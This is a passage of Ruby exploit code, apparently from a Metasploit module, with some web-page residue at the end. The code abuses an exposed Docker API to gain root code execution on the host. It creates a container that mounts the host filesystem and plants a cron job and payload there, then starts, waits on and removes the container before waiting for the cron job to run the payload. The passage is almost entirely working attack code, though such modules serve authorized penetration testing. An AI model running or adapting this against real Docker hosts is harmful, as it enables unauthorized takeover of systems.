||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('containers', 'create?name=' + container_id),
|
||||
'headers' => { 'Content-Type' => 'application/json' },
|
||||
'data' => make_container(mnt_path, cron_path, payload_path).to_json
|
||||
)
|
||||
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
|
||||
|
||||
print_status("The docker container is created, waiting for deploy")
|
||||
register_files_for_cleanup(cron_path, payload_path)
|
||||
|
||||
# start container
|
||||
send_request_raw(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('containers', container_id, 'start')
|
||||
},
|
||||
1 # timeout
|
||||
)
|
||||
|
||||
# wait until container stopped
|
||||
vprint_status("Waiting until the docker container stopped")
|
||||
res_wait = send_request_raw(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('containers', container_id, 'wait'),
|
||||
'headers' => { 'Accept' => 'application/json' }
|
||||
)
|
||||
|
||||
# delete container
|
||||
deleted_container = false
|
||||
if res_wait.code == 200
|
||||
vprint_status("The docker container has been stopped, now trying to remove it")
|
||||
del_container(container_id)
|
||||
deleted_container = true
|
||||
end
|
||||
|
||||
# if container does not deploy, remove it and fail out
|
||||
unless deleted_container
|
||||
del_container(container_id)
|
||||
fail_with(Failure::Unknown, "The docker container failed to deploy")
|
||||
end
|
||||
print_status('Waiting for the cron job to run, can take up to 60 seconds')
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue